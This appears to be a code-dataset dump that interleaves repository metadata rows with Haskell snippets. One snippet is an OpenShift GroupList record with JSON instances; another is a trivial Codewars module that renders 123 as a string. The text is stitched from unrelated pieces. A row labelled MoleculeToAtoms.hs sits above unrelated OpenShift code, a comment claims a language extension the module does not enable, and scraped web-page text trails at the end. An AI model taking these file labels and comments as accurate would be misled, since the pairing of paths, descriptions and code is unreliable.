| lihlcnkr/codejam | backup/src/CodeWars/MoleculeToAtoms.hs | apache-2.0 | 375 | 0 | 9 | 59 | 98 | 56 | 42 | 9 | 1 |
{-# LANGUAGE DataKinds #-}
{-# LANGUAGE DeriveGeneric #-}
{-# LANGUAGE TypeOperators #-}
{-# LANGUAGE OverloadedStrings #-}
{-# LANGUAGE GeneralizedNewtypeDeriving #-}
module Openshift.V1.GroupList where
import GHC.Generics
import Data.Text
import Openshift.Unversioned.ListMeta
import Openshift.V1.Group
import qualified Data.Aeson
-- | A list of 'Group' resources in the standard Kubernetes/OpenShift list
-- envelope (type metadata, list metadata, and the items themselves).
-- Serialized to/from JSON via the Generic-derived aeson instances below.
data GroupList = GroupList
  { kind :: Maybe Text -- ^ Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: http://releases.k8s.io/HEAD/docs/devel/api-conventions.md#types-kinds
  , apiVersion :: Maybe Text -- ^ APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: http://releases.k8s.io/HEAD/docs/devel/api-conventions.md#resources
  , metadata :: Maybe ListMeta -- ^ Standard list metadata.
  , items :: [Group] -- ^ list of groups
  } deriving (Show, Eq, Generic)

-- JSON codecs derived generically from the record's field names.
instance Data.Aeson.FromJSON GroupList
instance Data.Aeson.ToJSON GroupList
| minhdoboi/deprecated-openshift-haskell-api | openshift/lib/Openshift/V1/GroupList.hs | apache-2.0 | 1,162 | 0 | 9 | 172 | 125 | 77 | 48 | 19 | 0 |
-- http://www.codewars.com/kata/53934feec44762736c00044b
module NumberToString where

-- | Decimal rendering of the number 123; 'show' performs the
-- number-to-string conversion the kata asks for.  Explicit signature
-- added: top-level bindings should carry one (the module also enables
-- NoMonomorphismRestriction).
a :: String
a = show 123
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.